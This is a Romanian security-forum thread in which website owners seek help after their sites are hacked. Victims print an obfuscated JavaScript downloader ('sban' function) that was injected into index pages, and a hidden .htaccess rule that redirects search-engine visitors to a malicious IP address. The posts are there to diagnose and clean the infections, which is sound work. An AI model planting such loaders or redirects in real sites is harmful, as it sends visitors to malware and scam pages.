Help - Search - Members - Calendar
Full Version: Siteuri Infectate Cu Trojan Downloader C
Bitdefender Forum > Română > Topicuri vechi > Discuţii Malware
Cristinam
Toate site-urile noastre au fost infectate cu un virus identificat de Bitdifender ca fiind Trojan New Downloader C si de <removed> ca VBS:Psyme-I [Trj] . Practic in headerul tuturor fisierelor index si default era scris un script. Daca doriti, va pot posta si scriptul, pentru ca l-am copiat.

Initial am observat la un site. Am sters tot, peste 2 zile din nou. Am sters iar, a aparut din nou. Acum l-am sters a treia oara. Si am inceput sa verificam toate site-urile la care aveam conectare prin ftp pe calculatoarele noastre. Marea majoritate aveau acest script postat in headere.

Calculatoarele le-am scanat, am sters toate fisierele infectate. Acum am sters de pe 2 calculatoare toate datele de ftp, in caz ca se loga automat si trimitea scripturile.

Ce parere aveti? Ce este acest virus? Oare cel care face damage-urile nu este identificat? Si este identificat doar scriptul de pe site? Cum incercam sa ma conectez la site cum era vizualizat virusul de catre Antivirus.

Ce sfaturi imi dati? Mai stiti astfel de probleme?
claudiu
draga mea , de ce nu asculți lumea când spune că ”Internet Explorer(*) is EVIL!” biggrin.gif Chestia aia cu ce ai fost infectată se răspandește prin interfața activeX a IE. Apoi restul e istorie...

1. Rupe tot cu antivirusul
2. instaleaza si FOLOSESTE Firefox , Opera.
3. Updateaza sistemul la ZI.

(spoiler here, scroll)* dark side browser, do not use , it has cookies.


apoi , pe server :

Chestia aia se raspandeste printr-un exploit. Apropo , tu administrezi serverul? sau e la un companie de hosting? Apache este?
claudiu
Uite aici si un patch de la Microsoft
Cristinam
Nu administram noi serverul. Sunt la diverse companii de hosting. Da este apache serverul.
Cristinam
Oricum, ideea este ca cineva - un virus, nu?- scrie totusi pe fisierele index ale site-urile in mod repetat. Cum are acces acolo? Cum previn acest acces? Problema mare este ca apar acele scripturi pe site-urile respective.
Este clar ca noi suntem vinovati de bresa de securitate, sunt siteuri pe care le adminsitram noi .( dar gazduite pe diferite servere )
Iti multumesc pentru orice idee si orice ajutor.
claudiu
este un fel de worm ce scaneaza mereu de pe alte hosturi in cautare de gazde vulnerabile si se raspandeste pe baza putorii adminilor de la firma de gazduire. Eu in locul tau deja imi mutam site-ul pe alt hosting... e clar ca adminii de la cel prezent nu prea au treaba. Sau macar ai putea sa le spui chestia asta lor ... si sa o rezolve printr-un update daca stiu ce e aia...
Florin Stiuca
Vina apartine adminilor de server de acolo da-le un mail cat poti de repede si spune-le ca au serverele infectate. Poate nu strica sa-si face si un update la antivirusul pe care il au pe masinile lor de acolo.
Cristinam
QUOTE (Florin Stiuca @ Aug 13 2007, 02:25 PM) *
Vina apartine adminilor de server de acolo da-le un mail cat poti de repede si spune-le ca au serverele infectate. Poate nu strica sa-si face si un update la antivirusul pe care il au pe masinile lor de acolo.



buna Florin, asta am crezut si noi la inceput. Chiar ne-am burzuluit la una din firmele de hosting. Dar sa fim sinceri ei nu au nici o vina...atata timp cat toate site-urile noastre ( cu exceptia catorva ) au fost " inscriptionate" ...vorbim cam de peste 40 de siteuri pe 5 hostinguri diferite- cred.


Noi credem ca un troian a furat adresele si parolele de ftp si o data la 2 zile inscriptioneaza site-urile. Inepem acum sa schimbam parolele , mai putin 2 , de momeala...sa verificam ideea
Cristinam
QUOTE (claudiu @ Aug 13 2007, 02:13 PM) *
este un fel de worm ce scaneaza mereu de pe alte hosturi in cautare de gazde vulnerabile si se raspandeste pe baza putorii adminilor de la firma de gazduire. Eu in locul tau deja imi mutam site-ul pe alt hosting... e clar ca adminii de la cel prezent nu prea au treaba. Sau macar ai putea sa le spui chestia asta lor ... si sa o rezolve printr-un update daca stiu ce e aia...


Cladiu, cei de la hosting mi-au spus scurt ca e eroare de programare.... Deci totusi nu e posibila varianta in care troianul ne-a furat parolele si apoi se conecteaza de nebun si scrie pe server ca si cum ar fi autorizat sa o faca? Caz in care cei de la hosting nu au problema.


Mi-ar place foarte mult sa ma pricep la chestiile astea si sa ii dau o adresa falsa unde sa fie un cadou special pentru virusache...
Florin Stiuca
Eroare de programare unde? In scripturile voastre si in pagini, in bitdefender, sau unde ?

Au scanat ei server-ul si a fost gasit clean ?

Cred ca ar fi bine sa iei o pagina cu acel header schimbat si sa o postezi aici sau sa o pui ca atasament.

Atasament-ul sa-l faci punand pagina/paginile intr-o arhiva zip sau rar cu parola "infected". O sa pun pe cineva de aici sa se uite in ele ca sa vedem dac intradevar este o problema.
Cristinam
QUOTE (Florin Stiuca @ Aug 13 2007, 03:11 PM) *
Eroare de programare unde? In scripturile voastre si in pagini, in bitdefender, sau unde ?


Excludem eroarea de programare deoarece virusul apare pe site-uri de mai multe tipuri: site simplu HTML, site e-commerce OSC, site-uri dinamice cu programare PHP.

Deci in ce consta atacul acesta ( scuze in cazul in care ma repet, dar simt nevoia sa clarific situatia) :

Pe toate paginile index.html , index.php, default.php apare un script ca si prim cod in pagina ( inaintea codului HTML sau a codurilor PHP).

Mai jos e scriptul care apare in topul paginilor Index.
( am pus eu spatiile intre taguri..smile.gif)
<s c r i p t l a n g u a g e=J a v a S c r i p t>
function sban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,59,58,33,23,27,10,25,2,0,0,0,0,
,0,51,56,54,35,16,18,46,50,3,41,12,14,53,15,6,7,11,26,40,62,60,24,34,57,4,31,37,
,0,0,0,32,0,42,38,43,22,21,5,36,28,45,29,1,17,20,13,44,30,47,49,0,55,52,8,61,48,
9,19);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,cool.gif;i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])
<<s;if(s){r+=String.fromCharCode(121^w&255);w>>=8;s-=2}else{s=6}}document.write®}}sban
('fkrOP_kfhgZ9PRklpflHngxDd8ffDo_f5xXzJjZfPA4e7UfX5ukOkhe9lg_58WsXjuDXX4mdlxkX
XlHX4md7ussexklpwsX7srNDmkXnsxDlslOjxrf9WLlf8fXYosNmxrl@k')
</s c r i p t>

Raspunsul antivirusului Avast la pagina cu acest script in top este:
File name: http://miron555.org/s/index.php
Malware name: VBS:Psyme-I [Trj]
Malware type: Trojan Horse
VPS version: 000764-8


Antivirusul Bitdifender il recunoaste ca Trojan.New.Downloader.C
claudiu
poti sa imi spui te rog unde ai site-urile gazduite?

apropo ,
Domain Name: miron555.org

Status: OK

Registrar: Directi Internet Solutions d/b/a PublicDomainRegistry.Com (R27-LROR)

Expiration Date: 2008-04-23 09:00:32
Creation Date: 2007-04-23 09:00:32
Last Update Date: 2007-06-23 03:53:22

Name Servers:
ns1.palestine-dns.org
ns2.palestine-dns.org

si restul informatiilor sunt ascunse cu privacy protect. oricum o sa cada rapid domeniul
Cristinam
Ce reprezinta toate chestiile astea care mi le-ai scris? Si care domeniu o sa cada rapid? Ma scuzi, dar nu prea sunt familiara cu toate notiunile astea ...

Am site-urile gazduite la : mxhost.ro, alfaweb.ro, rds-rcs si mai sunt cateva la hostinguri pe care nu le cunosc, am doar datele de ftp.

Acum muncim din greu, ba stergem noi, ba scrie virusul...este ca intr-un film cu nebuni..si ne chinuim sa schimbam toate parolele de ftp. Ar putea sa fie un bug in ftp -ul de la windows commander? Am auzit ca nu ar fi super sigure.

Mai avem la lunarpages.com, ixwebhosting.com dar astea nu au patit nimic. Dar nici nu stim de unde au fost furate datele de logare. Nu pe toate calculatoarele aveam toate datele...Este o nebunie.

Cert este ca mi-am scanat calculatorul cu Bitdifender a gasit niste virusi , i-a sters. A doua zi am scanat iar, iar a gasit , iar a sters. Iar acum am pus sa scaneze si Avast asta - mi l-a recomandat un prieten si a mai gasit unul - troianul asta care l-am aratat la toti ( cel putin avea acelasi nume- L-a sters. Si i-am dat din nou sa scaneze si acum e curat.
Cristinam
a, scuze, mi-ai dat datele despre domeniul respectiv. Spune-mi te rog , exista un Forum unde pot sa reclam site-ul acesta? Sa se ia masuri impotriva sa? ....
claudiu
mda,in cazul de fata presupunerea mea e ca ori ti s-au furat parolele si cineva a lasat o mica portita deschisa pe servere. asta explica de ce mai multe servere sunt infectate.

ori rulai tu ceva scripturi vulnerabile pe pe ceva pagini si un worm ti-a venit de hac. (cel mai probabil) si aici gazduirea chiar nu are nici o vina.


domeniul miron555 a fost raportat de mine.
claudiu
QUOTE
A fost raportata o vulnerabilitate in phpBB ce poate fi exploatata de atacatori pentru a lansa atacuri de tip script insertion.

Vulnerabilitatea este cauzata de verificarea necorespunzatoare a datelor de intrare transmise prin intermediul elementului de tip tag url utilizat de suportul pentru cod de tip bbcode. Aceasta poate fi exploatata pentru a injecta cod arbitrar HTML si script ce va fi executat in sesiunea de browser a utilizatorului la vizitarea unui site afectat, cand acesta vizualizeaza datele atacatorului prin intermediul browser-ului Microsoft Internet Explorer.

Versiunile afectate de aceasta vulnerabilitate sunt:


phpBB 2.x



Te simti cumva ? biggrin.gif

Apropo, te sfatuiesc sa ai grija de capitolul securitate pentru ca in cazul in care cineva iti raporteaza site-ul ca fiind ”malware” isp-ului tau ,chiar daca nu a fost intentia ta sa-l faci in felul asta, poate sa-ti suspende contul fara nici un fel de explicatie.
ppscslv
QUOTE (Cristinam @ Aug 13 2007, 11:40 AM) *
Toate site-urile noastre au fost infectate cu un virus identificat de Bitdifender ca fiind Trojan New Downloader C si de Avast ca VBS:Psyme-I [Trj] . Practic in headerul tuturor fisierelor index si default era scris un script. Daca doriti, va pot posta si scriptul, pentru ca l-am copiat.

O problema de acest gen am si eu:toti vizitatorii ce-mi vin din motoarele de cautare sunt redirectionati catre httb://pc-anti-virus-scanner.com/2...n.php?nu=880865 (acum o saptamana ma directiona catre http://anti-virus-secure-scanner.com/). Am cautat in header, footer, in index.html si php si nici urma de functia sban. De fapt am cautat de nebun prin mai toate fisierele dar n-am gasit nimic.

Am luat legatura cu cei de la http://ixwebhosting.com (cei cu hostingul) si le-am explicat ce si cum. Ei mi-au zis ca e imposibil ca un troian sa scrie pe server, daca nu cumva am dat eu chmod 777 la directoare. Le-am explicat ca n-am umblat la permisiuni, ca le-am lasat default, ca mi-am schimbat chiar si parolele si... tot pe a lor o tineau. Le-am recomandat si forumul acesta, precizandu-le ca suspectez ca Trojan Downloader C e problema mea, ca e vb de un script si nu-l pot gasi.

Unul din blogurile cu probleme este brotacu.com (am detaliat problema si aici: http://brotacu.com/blog/2008/12/redirectionare-via-script/) . Am observat ca daca prin google (sau alt motor de cautare) e accesata pagina de index nu se face redirectionarea, ci doar cand sunt accesate celelalte pagini ale blogului. Platforma este wordpress. Am verificat cu un tool online ce site-uri mai gazduiesc cei de la ixwebhosting.com, iar dupa verificarea a vreo 15 site-uri am identificat 3 cu aceeasi problema. Am raportat celor de la tehnic, unde am blogul gazduit, la fel, o tineau pe a lor, ca serverele lor n-au probleme, ci e vina mea.

Ce sa fac?
Christian
Site-ul ala(la mine nu mergein Firefox) e de rogue(fake antivirus).

QUOTE
<s c r i p t l a n g u a g e=J a v a S c r i p t> function sban(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,9,59,58,33,23,27,10,25,2,0,0,0,0, ,0,51,56,54,35,16,18,46,50,3,41,12,14,53,15,6,7,11,26,40,62,60,24,34,57,4,31,37, ,0,0,0,32,0,42,38,43,22,21,5,36,28,45,29,1,17,20,13,44,30,47,49,0,55,52,8,61,48, 9,19);for(j=Math.ceil(l/b);j>0;j–){r=”;for(i=Math.min(l,;i>0;i–,l–){w|=(t[x.charCodeAt(p++)-48]) <<s;if(s){r+=String.fromCharCode(121^w&255);w>>=8;s-=2}else{s=6}}document.write®}}sban (’fkrOP_kfhgZ9PRklpflHngxDd8ffDo_f5xXzJjZfPA4e7UfX5ukOkhe9lg_58WsXjuDXX4mdlx
kX XlHX4md7ussexklpwsX7srNDmkXnsxDlslOjxrf9WLlf8fXYosNmxrl@k’) </s c r i p t>


Asta zici ca e scriptul ?
ppscslv
Site-ul catre care sunt redirectionat nu mai merge pt ca isi schimba adresa la cateva zile. Scriptul nu l-am gasit in site, dar banuiesc ca il am ascuns pe undeva, printr-un fisier, ce e solicitat cand probabil e apelata o functie. Cred ca am scriptul acesta ascuns deoarece am cautat pe multe forumuri si am vazut ca adresa catre care mi se face redirectionarea se realizeaza prin functia sban(x) .

Ieri am vazut la voi pe forum ca exista un tip de malware responsabil de ARP poisoning. Sa fie si asta o cauza?

Multe cunostiinte de ale mele se plang de redirectionarea asta desi fac parte din retele diferite (DCN, UPC, Czone, Zapp) si aceseaza site-uri deferite de ale mele. Multi si-au formatat, scanat si rescanat PC-urile crezand ca e vorba de un virus, dar nimic. Sa fie vorba de ARP Poisoning raspandit pe arii atat de mari? asta ar insemna ca si reteaua din care fac parte serverele celor de la ixwehosting.com sa fie infectata.

Sper sa scap o data de redirectionarea asta...
Sm3K3R
QUOTE (ppscslv @ Jan 6 2009, 08:52 AM) *
Site-ul catre care sunt redirectionat nu mai merge pt ca isi schimba adresa la cateva zile. Scriptul nu l-am gasit in site, dar banuiesc ca il am ascuns pe undeva, printr-un fisier, ce e solicitat cand probabil e apelata o functie. Cred ca am scriptul acesta ascuns deoarece am cautat pe multe forumuri si am vazut ca adresa catre care mi se face redirectionarea se realizeaza prin functia sban(x) .

Ieri am vazut la voi pe forum ca exista un tip de malware responsabil de ARP poisoning. Sa fie si asta o cauza?

Multe cunostiinte de ale mele se plang de redirectionarea asta desi fac parte din retele diferite (DCN, UPC, Czone, Zapp) si aceseaza site-uri deferite de ale mele. Multi si-au formatat, scanat si rescanat PC-urile crezand ca e vorba de un virus, dar nimic. Sa fie vorba de ARP Poisoning raspandit pe arii atat de mari? asta ar insemna ca si reteaua din care fac parte serverele celor de la ixwehosting.com sa fie infectata.

Sper sa scap o data de redirectionarea asta...


Sa nu fie o problema cu serverele DNS,pentru mai multe detalii citeste aici : http://en.wikipedia.org/wiki/DNS_cache_poisoning
Pentru mai multa informatie da search in Google trojan DNS changer .
ppscslv
QUOTE (Sm3K3R @ Jan 6 2009, 02:31 PM) *
Sa nu fie o problema cu serverele DNS,pentru mai multe detalii citeste aici : http://en.wikipedia.org/wiki/DNS_cache_poisoning
Pentru mai multa informatie da search in Google trojan DNS changer .

iar in cazul acesta problema cu serverele DNS ar fi la ixwebhosting.com (unde sunt hostate site-urile), nu?
Florin Stiuca
Nu este o problema de DNS ci o problema de exploit. Acesta poate fi atat la nivelul de cms (phpBB, ipB si chiar wordpress a mai avut probleme) sau varianta doi ati dat un CHMOD 7777 si cu ajutorul configurarii proaste a serverului un mic trojan se joaca pe acolo.

Nici una din problemele astea nu tine de BD decat pentru userul care acceseaza pagina "infectata"
ppscslv
La CHMOD n-am umblat, deci raman celelalte variante. Multumesc mult, voi mai face research-uri si voi dialoga cu cei de la ixwebhosting. Revin cu detalii...
ppscslv
Am gasit ceva pe net si cred aproape 100% ca asta e problema mea: http://blog.unmaskparasites.com/2008/12/08...access-exploit/
ppscslv
Da! Chiar asta era problema. In .htaccess era scris dupa 66 de enteruri(linii) - ca sa para gol fisierul - urmatorul cod:
CODE
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://87.248.180.89/topic.html?s=s [R,L]


Eu am ster codul si am scris:
CODE
RewriteEngine Off

(ca oricum mai mult de atat n-am habar ce sa fac) si nu se mai face redirectionarea, adica am scapat de problema. Numai ca nu stiu pt cat timp, ca daca cineva (persoana sau program) a putut sa-mi scrie in fisierul htaccess o va putea face in continuare. La permisiuni am (user)rw, la (group)r (Other)r . Ce recomandari imi dati?

ms anticipat!
Christian
Pai lasa-le asa deocamdata si urmareste ce se intampla smile.gif
ppscslv
OK!
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
Invision Power Board © 2001-2014 Invision Power Services, Inc.